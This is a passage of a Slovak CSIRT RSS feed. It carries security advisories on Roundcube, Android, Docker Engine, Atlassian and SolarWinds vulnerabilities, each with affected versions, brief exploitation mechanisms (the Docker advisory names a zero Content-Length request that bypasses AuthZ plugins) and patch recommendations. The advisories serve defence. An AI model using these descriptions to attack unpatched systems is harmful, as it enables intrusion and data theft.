					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/Roundcube.webp" alt="" /></p>Populárna webmailová platforma Roundcube obsahuje tri vysoko závažné zraniteľnosti, ktoré by vzdialený neautentifikovaný útočník zaslaním škodlivého e-mailu mohol zneužiť na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/Roundcube.webp" alt="" /></p>
<p><strong>Populárna webmailová platforma Roundcube obsahuje tri vysoko závažné zraniteľnosti, ktoré by vzdialený neautentifikovaný útočník zaslaním škodlivého e-mailu mohol zneužiť na realizáciu XSS útoku, získanie perzistencie v systéme obete, krádež citlivých údajov a rozposielanie e-mailových správ.</strong></p>



<p><p class="MsoNormal" style="mso-margin-bottom-alt:auto;text-align:justify;
line-height:15.75pt;background:white"><b><span style="mso-fareast-font-family:
&quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;
color:black;mso-fareast-language:SK">Zraniteľné systémy:</span></b><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin;color:black;mso-fareast-language:SK"></span></p></p>



<ul>
<li>Roundcube verzie 1.6.7,  1.5.7 a staršie</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p>Vo webmailovej platforme Roundcube bolo opravených niekoľko vysoko závažných zraniteľností, ktoré útočníkom umožňujú vykonávať škodlivé skripty JavaScript v prehliadači obete. Útočník môže získať perzistenciu v systéme a priebežne kradnúť e-maily, kontakty alebo exfiltrovať heslo do konta, keď ho obeť zadá. Môže tiež odosielať e-maily z konta obete.<br><br><strong>C</strong><b><span style="mso-fareast-font-family:
&quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;
color:black;mso-fareast-language:SK">VE-2024-42008</span></b><br>Zraniteľnosť vo funkcii rcmail_action_mail_get->run() umožňujúca vykonať útok typu cross-site scripting pomocou škodlivej hlavičky Content-Type prílohy e-mailu. Obeť musí s prílohou interagovať.<br><br><strong>CVE-2024-42009</strong><br>Zraniteľnosť typu cross-site scripting funkcie message_body() v program/actions/mail/show.php súvisí s nesprávnym spracovaním sanitizovaného obsahu HTML. Pre zneužitie zraniteľnosti stačí, aby si obeť pozrela škodlivý e-mail.<br><br><strong>CVE-2024-42010</strong> (CVSSv3 skóre 7,5)<br>Zraniteľnosť vedúca k úniku informácií, ktorá súvisí s nedostatočným filtrovaním CSS, ktoré má na starosti funkcia mod_css_styles.<br><br>Zraniteľnosti odhalil Oskar Zeino-Mahmalat zo spoločnosti Sonar.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k citlivým údajom</strong><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span> </li>



<li><strong>Vykonanie škodlivého kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia Roundcube aspoň na verzie 1.6.8 alebo 1.5.8.</strong></p>



<p><strong>Zdroje:</strong><br><a href="https://roundcube.net/news/2024/08/04/security-updates-1.6.8-and-1.5.8">https://roundcube.net/news/2024/08/04/security-updates-1.6.8-and-1.5.8</a><br><a href="https://www.helpnetsecurity.com/2024/08/07/cve-2024-42009-cve-2024-42008/">https://www.helpnetsecurity.com/2024/08/07/cve-2024-42009-cve-2024-42008/</a><br><a href="https://thehackernews.com/2024/08/roundcube-webmail-flaws-allow-hackers.html">https://thehackernews.com/2024/08/roundcube-webmail-flaws-allow-hackers.html</a><br><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-42008">https://nvd.nist.gov/vuln/detail/CVE-2024-42008</a><br><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-42009">https://nvd.nist.gov/vuln/detail/CVE-2024-42009</a><br><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-42010">https://nvd.nist.gov/vuln/detail/CVE-2024-42010</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1210/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v jadre Android</title>
		<link>/posts/1207</link>
					<comments>/posts/1207#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 08 Aug 2024 13:58:27 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1207</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/android-1024x683.jpg" alt="" /></p>Spoločnosť Google vydala balík opráv pre OS Android, ktorý okrem iného  rieši vysoko závažnú zero-day zraniteľnosť jadra, umožňujúcu vzdialené vykonávanie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/android-1024x683.jpg" alt="" /></p>
<p><strong>Spoločnosť Google vydala balík opráv pre OS Android, ktorý okrem iného  rieši vysoko závažnú zero-day zraniteľnosť jadra, umožňujúcu vzdialené vykonávanie kódu. Zraniteľnosť je pravdepodobne zneužívaná pri cielených útokoch.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Android</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-36971</strong> (CVSSv3 skóre 7,8)<br><br>Vysoko závažná zraniteľnosť v <strong>jadre OS Android</strong> súvisí s nesprávnou implementáciou pravidiel read-copy update (<strong>RCU</strong>) pri riadení určitých sieťových spojení. Útočníkom umožňuje zneužiť <strong>dealokované miesto v pamäti</strong> a následne <strong>vzdialene vykonávať kód</strong> bez interakcie používateľa. Úspešné zneužitie vyžaduje oprávnenia na úrovni <strong>SYSTEM</strong>. Zraniteľnosť pravdepodobne <strong>aktívne zneužívajú</strong> poskytovatelia komerčného špionážneho malvéru <strong>pri cielených útokoch</strong> za zraniteľné zariadenia.<br><br>Zraniteľnosť objavil bezpečnostný výskumník Clement Lecigne z tímu Google Threat Analysis Group (TAG).<br><br>Spoločnosť Google opravila v príslušnom balíku pre Android ďalších 14 zraniteľností umožňujúcich zvýšenie oprávnení, spôsobenie nedostupnosti služby a získavanie informácií. Augustový balík opravuje spolu 47 zraniteľností vrátane mnohých nachádzajúcich sa v komponentoch spoločností Arm, Imagination Technologies, MediaTek a Qualcomm.</p>



<p><p class="MsoNormal" style="mso-margin-bottom-alt:auto;text-align:justify;
line-height:15.75pt;background:white"><b><span style="mso-fareast-font-family:
&quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;
color:black;mso-fareast-language:SK">Možné škody:</span></b><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin;color:black;mso-fareast-language:SK"></span></p></p>



<ul>
<li>Vzdialené vykonávane kódu</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná inštalácia augustových opravných aktualizácií Android.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://source.android.com/docs/security/bulletin/2024-08-01#Android-and-Google-service-mitigations">https://source.android.com/docs/security/bulletin/2024-08-01#Android-and-Google-service-mitigations</a><br><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-36971">https://nvd.nist.gov/vuln/detail/CVE-2024-36971</a><br><a href="https://thehackernews.com/2024/08/google-patches-new-android-kernel.html">https://thehackernews.com/2024/08/google-patches-new-android-kernel.html</a><br><a href="https://www.bleepingcomputer.com/news/security/google-fixes-android-kernel-zero-day-exploited-in-targeted-attacks/">https://www.bleepingcomputer.com/news/security/google-fixes-android-kernel-zero-day-exploited-in-targeted-attacks/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1207/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností júl 2024</title>
		<link>/posts/1203</link>
					<comments>/posts/1203#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 06 Aug 2024 13:23:56 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1203</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci júl 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci júl 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/08/2024_07_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/08/2024_07_mesacnik.pdf">Mesačný prehľad – 07/2024 PDF (278 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" data-type="link" data-id="https://www.csirt.gov.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti.html?csrt=4087702320029811072">tomto odkaze</a>.</p>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1203/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Návod &#8211; nastavenie 2-faktorovej autentifikácie na Google</title>
		<link>/posts/1187</link>
					<comments>/posts/1187#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 05 Aug 2024 15:12:19 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[MFA]]></category>
		<category><![CDATA[návod]]></category>
		<guid isPermaLink="false">/?p=1187</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/Gmail_MFA1.png" alt="" /></p>Pripravili sme si pre vás návod, ako si zabezpečíte svoj účet Google aj pred útočníkmi, ktorí poznajú vaše heslo. Podobným...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/Gmail_MFA1.png" alt="" /></p>
<p>Pripravili sme si pre vás návod, ako si zabezpečíte svoj účet Google aj pred útočníkmi, ktorí poznajú vaše heslo. Podobným spôsobom sa môžete brániť aj na mnohých iných webových službách a aplikáciách, ktoré používate.</p>



<p>Stiahnuť si ho môžete v sekcii <strong>Metodiky a návody <a href="https://csirt.sk/wp-content/uploads/2024/08/MFA_Gmail.pdf" data-type="link" data-id="/wp-content/uploads/2024/08/MFA_Gmail.pdf">TU</a></strong>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1187/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v Docker Engine</title>
		<link>/posts/1177</link>
					<comments>/posts/1177#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 25 Jul 2024 14:52:16 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Authorization bypasses]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=1177</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/docker.png" alt="" /></p>Vývojári kontajnerizačnej technológie Docker Engine vydali bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť. CVE-2024-41110 možno zneužiť na obídenie autorizačných pluginov...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/docker.png" alt="" /></p>
<p><strong>Vývojári kontajnerizačnej technológie Docker Engine vydali bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť. CVE-2024-41110 možno zneužiť na obídenie autorizačných pluginov AuthZ a eskaláciu privilégií. Jedná sa o&nbsp;opätovný výskyt zraniteľnosti odstránenej v&nbsp;januári 2019, ktorej oprava nebola zakomponovaná do novších verzií Docker Engine 19.03 a&nbsp;vyššie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Docker Engine vo verziách starších ako v23.0.14 (vrátane)</li>



<li>Docker Engine vo verziách starších ako v27.1.0 (vrátane)</li>



<li>Docker Desktop vo verziách starších ako v4.33</li>
</ul>



<p>Pozn. &nbsp;&nbsp; Zraniteľnosť je možné zneužiť len na inštanciách využívajúcich autorizačné pluginy AuthZ. Inštancie, ktoré nevyužívajú autorizačné pluginy a&nbsp;všetky verzie Miranis Container Runtime nie sú zraniteľné.</p>



<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Zneužitie zraniteľnosti v&nbsp;nástroji Docker Desktop je zložitejšie, nakoľko útočník musí disponovať prístupom k&nbsp;Docker API, ktoré je v&nbsp;štandardnej konfigurácii prístupné len pre používateľov s&nbsp;lokálnym prístupom k&nbsp;hostiteľskému systému.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-41110 </strong>(CVSS skóre 10,0)</p>



<p>Kritická bezpečnostnú zraniteľnosť sa na nachádza v&nbsp;autorizačných pluginoch AuthZ, ktoré slúžia na filtrovanie prichádzajúcich API požiadaviek na základe autentifikácie a&nbsp;kontextu príkazov. CVE-2024-41110 možno zneužiť zaslaním špeciálne vytvorenej požiadavky s&nbsp;poľom Content-Length nastaveným na hodnotu 0, ktoré Docker démon preposiela na autorizačné pluginy bez tela požiadavky, čo môže viesť k&nbsp;ich nesprávnemu vyhodnoteniu a&nbsp;následnému vykonaniu príkazov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie mechanizmov autorizácie</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame bezodkladnú aktualizáciu zraniteľných systémov na najnovšiu verziu Docker Engine. Nakoľko aktualizácie na Docker Desktop ešte nie sú dostupné, odporúčame sledovať stránky výrobcu a&nbsp;po vydaní verzie 4.33 vykonať bezodkladnú aktualizáciu.</p>



<p>V&nbsp;prípadoch, kedy aktualizácia nie je možná, výrobca odporúča deaktivovať autorizačné pluginy AuthZ a&nbsp;limitovať prístup k&nbsp;Docker API len na dôveryhodné subjekty.</p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://www.docker.com/blog/docker-security-advisory-docker-engine-authz-plugin/">https://www.docker.com/blog/docker-security-advisory-docker-engine-authz-plugin/</a></p>



<p><a href="https://www.csoonline.com/article/3477530/docker-re-fixes-a-critical-authorization-bypass-vulnerability.html">https://www.csoonline.com/article/3477530/docker-re-fixes-a-critical-authorization-bypass-vulnerability.html</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/docker-fixes-critical-5-year-old-authentication-bypass-flaw/">https://www.bleepingcomputer.com/news/security/docker-fixes-critical-5-year-old-authentication-bypass-flaw/</a></p>



<p><a href="https://thehackernews.com/2024/07/critical-docker-engine-flaw-allows.html">https://thehackernews.com/2024/07/critical-docker-engine-flaw-allows.html</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1177/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v serveroch Atlassian</title>
		<link>/posts/1172</link>
					<comments>/posts/1172#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 19 Jul 2024 14:59:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Atlassian]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1172</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/atlassian-logo-4139587245-1024x724.jpg" alt="" /></p>Spoločnosť Atlassian vydala bezpečnostné aktualizácie svojich produktov Bamboo Data Center a Server, Confluence Data Center a Server, Jira Data Center and Server...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/atlassian-logo-4139587245-1024x724.jpg" alt="" /></p>
<p><strong>Spoločnosť Atlassian vydala bezpečnostné aktualizácie svojich produktov Bamboo Data Center a Server, Confluence Data Center a Server, Jira Data Center and Server a Jira Service Management Data Center a Server, ktoré opravujú 30 zraniteľností. Najzávažnejšie zraniteľnosti nachádzajúce sa v Bamboo Data Center a Server možno zneužiť na realizáciu SSRF útokov, vzdialené vykonanie lokálnych súborov a získanie neoprávneného prístupu do systému. Ostatné zraniteľnosti možno zneužiť na zneprístupnenie služby, získanie neoprávneného prístupu do systému alebo vykonanie neoprávnených zmien v systéme.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Bamboo Data Center a Server vo verziách 9.6.0 &#8211; 9.6.3 (LTS), 9.5.0 &#8211; 9.5.4, 9.4.0 &#8211; 9.4.4, 9.3.0 &#8211; 9.3.6, 9.2.1 &#8211; 9.2.15 (LTS), 9.1.0 &#8211; 9.1.3, 9.0.0 &#8211; 9.0.4</li>



<li>Confluence Data Center a Server vo verziách 8.9.0 &#8211; 8.9.3, 8.8.0 &#8211; 8.8.1, 8.7.1 &#8211; 8.7.2, 8.6.0 &#8211; 8.6.2, 8.5.0 &#8211; 8.5.11 (LTS), 8.4.0 &#8211; 8.4.5, 8.3.0 &#8211; 8.3.4, 8.2.0 &#8211; 8.2.3, 8.1.0 &#8211; 8.1.4, 8.0.0 &#8211; 8.0.4, 7.20.0 &#8211; 7.20.3, 7.19.0 &#8211; 7.19.24 (LTS)</li>



<li><span style="font:7.0pt &quot;Times New Roman&quot;"></span>Jira Data Center a Server vo verziách 9.7.0 &#8211; 9.7.2, 9.6.0, 9.5.0 &#8211; 9.5.1, 9.4.0 &#8211; 9.4.17 (LTS), 9.3.0 &#8211; 9.3.3, 9.2.0 &#8211; 9.2.1, 9.1.0 &#8211; 9.1.1</li>



<li>Jira Service Management Center a Server vo verziách 5.7.0 &#8211; 5.7.2,  5.6.0, 5.5.0 &#8211; 5.5.1, 5.4.0 &#8211; 5.4.17 (LTS), 5.3.0 &#8211; 5.3.3, 5.2.0 &#8211;  5.2.1, 5.1.0 &#8211; 5.1.1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-21687</strong> (CVSS skóre 8,1)<br>Zraniteľnosť v produkte Bamboo Data Center a Server by vzdialený autentifikovaný útočník mohol zneužiť na zobrazenie obsahu alebo vykonanie lokálnych súborov.</p>



<p><strong>CVE-2024-22262</strong> (CVSS skóre 8,1)<br>CVE-2024-22262 v produkte Bamboo Data Center a Server sa nachádza v komponente org.springframework:spring-web a vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu SSRF (Server Side Request Forgery) útokov s následkom narušenia dôvernosti a integrity zraniteľných systémov.</p>



<p>Ostatné opravené zraniteľnosti môžu spôsobiť najmä nedostupnosť služby alebo umožňujú vykonávanie útokov XSS.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v systém</strong></li>



<li><b style="mso-bidi-font-weight:normal"><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK">Vykonanie škodlivého kódu</span></b></li>



<li><b><span style="mso-fareast-font-family:
     &quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;
     mso-fareast-language:SK">Zneprístupnenie služby</span></b><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span></li>



<li><b><span style="mso-fareast-font-family:
     &quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;
     mso-fareast-language:SK">Neoprávnený prístup k citlivým údajom</span></b><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span></li>
</ul>



<p><strong>Odporúčania:</strong><br>Aktualizácia zraniteľných systémov na bezpečné verzie špecifikované výrobcom:</p>



<ul>
<li><span style="font:7.0pt &quot;Times New Roman&quot;"></span><strong>Bamboo Data Center a Server</strong> na verzie <strong>9.6.4 (LTS) (odporúčaná verzia, len verzie Data Center)</strong>, 9.2.16 (LTS)</li>



<li><strong>Confluence Data Center a Server</strong> na verzie 8.9.4 (len verzie Data Center), <strong>8.5.12 (LTS) (odporúčaná verzia)</strong>, 7.19.25 (LTS)</li>



<li><span style="font:7.0pt &quot;Times New Roman&quot;"></span><strong>Jira Data Center a Server</strong> na verzie 9.8.0 a novšie, <strong>9.12.0 &#8211; 9.12.11 (LTS) (odporúčaná verzia)</strong>, 9.4.18 &#8211; 9.4.24 (LTS)</li>



<li><strong>Jira Service Management Center a Server</strong> na verzie 5.8.0 a novšie, <strong>5.12.0 &#8211; 5.12.11 (LTS) (odporúčaná verzia)</strong>, 5.4.18 &#8211; 5.4.24 (LTS)</li>
</ul>



<p><strong>Zdroje:</strong><br><a href="https://confluence.atlassian.com/security/security-bulletin-july-16-2024-1417150917.html">https://confluence.atlassian.com/security/security-bulletin-july-16-2024-1417150917.html<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a><br><a href="https://jira.atlassian.com/browse/BAM-25822">https://jira.atlassian.com/browse/BAM-25822</a><br><a href="https://jira.atlassian.com/browse/BAM-25808"><span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span>https://jira.atlassian.com/browse/BAM-25808</a><br><a href="https://jira.atlassian.com/browse/CONFSERVER-96103"><span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span>https://jira.atlassian.com/browse/CONFSERVER-96103</a><br><a href="https://jira.atlassian.com/browse/CONFSERVER-96102"><span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span>https://jira.atlassian.com/browse/CONFSERVER-96102</a><br><a href="https://jira.atlassian.com/browse/CONFSERVER-96101￼"><span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span>https://jira.atlassian.com/browse/CONFSERVER-96101<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a><br><a href="https://jira.atlassian.com/browse/CONFSERVER-96100">https://jira.atlassian.com/browse/CONFSERVER-96100</a><br><a href="https://jira.atlassian.com/browse/CONFSERVER-96099￼"><span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span>https://jira.atlassian.com/browse/CONFSERVER-96099<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a><br><a href="https://jira.atlassian.com/browse/CONFSERVER-96135">https://jira.atlassian.com/browse/CONFSERVER-96135<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a><br><a href="https://jira.atlassian.com/browse/CONFSERVER-96134">https://jira.atlassian.com/browse/CONFSERVER-96134</a><br><a href="https://jira.atlassian.com/browse/JSWSERVER-25951"><span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span>https://jira.atlassian.com/browse/JSWSERVER-25951</a><br><a href="https://jira.atlassian.com/browse/JSDSERVER-15436">https://jira.atlassian.com/browse/JSDSERVER-15436</a></p>



<p> </p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1172/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch SolarWinds Access Rights Manager</title>
		<link>/posts/1169</link>
					<comments>/posts/1169#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 19 Jul 2024 13:38:25 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Solarwinds]]></category>
		<guid isPermaLink="false">/?p=1169</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/06/blob.png" alt="" /></p>Spoločnosť SolarWinds vydala bezpečnostné aktualizácie produktu SolarWinds Access Rights Manager, ktoré opravujú 13 zraniteľností, z toho 8 označených ako kritické. Kritické...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/06/blob.png" alt="" /></p>
<p><strong>Spoločnosť SolarWinds vydala bezpečnostné aktualizácie produktu SolarWinds Access Rights Manager, ktoré opravujú 13 zraniteľností, z toho 8 označených ako kritické. Kritické zraniteľnosti možno zneužiť na vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom. Ostatné zranite­­ľnosti umožňujú neoprávnený prístup do systému, neoprávnený prístup k citlivým údajom a vykonanie neoprávnených zmien v systéme.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SolarWinds Access Rights Manager vo verzii 2024.2.4 a staršej</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong><br><strong>CVE-2024-23466, CVE-2024-23467, CVE-2024-23469, CVE-2024-23470, CVE-2024-23471, CVE-2024-23472, CVE-2024-28074, CVE-2024-23475</strong> (CVSS skóre 9,6)<br>Kritické zraniteľnosti umožňujúce zneužitie vnútornej deserializácie,  využitie nebezpečnej metódy a prechádzanie obsahu adresárov by  autentifikovaný alebo neautentifikovaný útočník nachádzajúci sa  v rovnakej sieti mohol zneužiť na vykonanie škodlivého kódu, získanie  neoprávneného prístupu k citlivým údajom, zvýšenie oprávnení, mazaniu  a čítaniu súborov alebo vykonanie neoprávnených zmien v systéme.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Vzdialené vykonanie kódu</li>



<li>Eskalácia privilégií</li>



<li>Neoprávnený prístup do systému</li>



<li>Neoprávnený prístup k citlivým údajom</li>



<li>Vykonanie neoprávnených zmien v systéme</li>



<li>Úplné narušenie dôvernosti, integrity a dostupnosti systém</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Administrátorom a používateľom odporúčame bezodkladne aktualizovať SolarWinds Access Rights Manager na verziu 2024.3 a novšie.</strong></p>



<p><strong>Zdroje:</strong><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23466">https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23466<span style="font-size:11.5pt;mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
Calibri;mso-bidi-theme-font:minor-latin;color:black;mso-fareast-language:SK"></span></a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23467">https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23467</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23469￼"><span style="font-size:11.5pt;line-height:107%;mso-fareast-font-family:&quot;Times New Roman&quot;;
mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;color:black;
mso-fareast-language:SK"></span>https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23469<span style="font-size:11.5pt;line-height:107%;mso-fareast-font-family:&quot;Times New Roman&quot;;
mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;color:black;
mso-fareast-language:SK"></span></a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23470">https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23470<span style="font-size:11.5pt;line-height:107%;mso-fareast-font-family:&quot;Times New Roman&quot;;
mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;color:black;
mso-fareast-language:SK"></span></a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23471">https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23471</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23472￼"><span style="font-size:11.5pt;line-height:107%;mso-fareast-font-family:&quot;Times New Roman&quot;;
mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;color:black;
mso-fareast-language:SK"></span>https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23472<span style="font-size:11.5pt;line-height:107%;mso-fareast-font-family:&quot;Times New Roman&quot;;
mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;color:black;
mso-fareast-language:SK"></span></a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28074">https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28074</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23475"><span style="font-size:11.5pt;line-height:107%;mso-fareast-font-family:&quot;Times New Roman&quot;;
mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;color:black;
mso-fareast-language:SK"></span>https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23475</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23465"><span style="font-size:11.5pt;line-height:107%;mso-fareast-font-family:&quot;Times New Roman&quot;;
mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;color:black;
